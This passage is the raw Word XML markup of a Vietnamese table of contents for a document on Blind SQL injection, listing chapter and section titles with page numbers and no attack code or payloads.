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9374303" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1444739"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00410F30" w:rsidRPr="00612934" w:rsidRDefault="00612934" w:rsidP="00410F30">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
            <w:t>MỤC LỤC</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w:rsidR="00D655B3" w:rsidRDefault="00B70950">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00410F30">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc459374303" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>MỤC LỤC</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374303 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</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04" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DA</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>NH MỤC HÌNH VẼ</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374304 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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05" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>DANH MỤC TỪ VIẾT TẮT</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374305 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</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06" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>LỜI MỞ ĐẦU</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374306 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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07" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 1: Tấn công Blind SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374307 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</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08" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374308 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</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09" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</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Nguyên tắc hoạt động của ứng dụng web sử dụng cơ sở dữ liệu.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374309 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</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10" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</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Lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374310 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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11" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</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Nguyên nhân của lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374311 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</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12" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.</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Ảnh hưởng của lỗ hổng SQL injection với tổ chức.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374312 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</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13" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Khai thác lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374313 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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15" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</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Phân biệt các hình thức tấn công SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374315 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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16" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</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Tấn công sử dụng thông báo lỗi</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374316 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</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17" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</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Tấn công sử dụng mệnh đề UNION</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374317 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</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18" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.</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Tấn công Out of Band Channel</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374318 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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19" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.</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Các kỹ thuật tấn công nâng cao</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374319 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</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20" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374320 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</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24" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</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Tấn công Blind SQL injection dạng Content-Based</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374324 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</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25" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</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Tấn công Blind SQL injection dạng Time-Based</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374325 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</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26" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 2: Các phương pháp tối ưu hóa tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374326 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</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27" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
